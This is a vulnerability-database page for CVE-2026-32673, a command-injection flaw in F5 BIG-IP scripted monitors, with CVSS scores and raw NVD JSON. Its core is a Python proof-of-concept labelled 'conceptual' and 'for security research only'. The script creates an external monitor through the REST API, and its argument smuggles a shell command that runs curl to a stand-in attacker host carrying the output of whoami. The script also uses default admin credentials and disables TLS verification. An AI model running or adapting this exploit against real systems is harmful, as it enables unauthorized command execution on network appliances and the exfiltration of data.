Security Vulnerability Report
中文
CVE-2026-32673 CVSS 8.7 HIGH

CVE-2026-32673

Published: 2026-05-13 16:16:39
Last Modified: 2026-05-13 16:27:11

Description

A vulnerability exists in BIG-IP scripted monitors that may allow an authenticated attacker with the Resource Administrator or Administrator role to execute arbitrary system commands with higher privileges. In appliance mode deployments, a successful exploit can allow the attacker to cross a security boundary.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

F5 BIG-IP (具体受影响版本列表请参考官方K000161040)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ Conceptual PoC for CVE-2026-32673 Demonstrates command injection via F5 BIG-IP Scripted Monitor. Requires Administrator or Resource Administrator privileges. """ import requests import urllib3 # Disable SSL warnings for lab environments urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def exploit(target_ip, username, password): # F5 BIG-IP API endpoint for External Monitors base_url = f"https://{target_ip}/mgmt/tm/ltm/monitor/external" # Authentication auth = (username, password) headers = {'Content-Type': 'application/json'} # Malicious payload: Injecting a shell command within the monitor script argument # The vulnerability allows arbitrary command execution via the script configuration monitor_name = "poc_exploit_monitor" malicious_command = "; /bin/bash -c 'curl http://attacker-server/$(whoami)'" payload = { "name": monitor_name, "filename": "/Common/sample_external_monitor", "args": malicious_command # Injection point } try: print(f"[*] Attempting to create monitor on {target_ip}...") response = requests.post(base_url, json=payload, auth=auth, headers=headers, verify=False) if response.status_code == 200 or response.status_code == 201: print("[+] Monitor created successfully. Check your listener for command execution.") print("[+] Note: The monitor must be associated with a pool member to trigger execution.") else: print(f"[-] Failed to create monitor. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": # Replace with actual lab credentials TARGET_IP = "192.168.1.100" USER = "admin" PASS = "admin" exploit(TARGET_IP, USER, PASS)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32673", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:39.380", "lastModified": "2026-05-13T16:27:11.127", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in BIG-IP scripted monitors that may allow an authenticated attacker with the Resource Administrator or Administrator role to execute arbitrary system commands with higher privileges. In appliance mode deployments, a successful exploit can allow the attacker to cross a security boundary.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-250"}]}], "references": [{"url": "https://my.f5.com/manage/s/article/K000161040", "source": "[email protected]"}]}}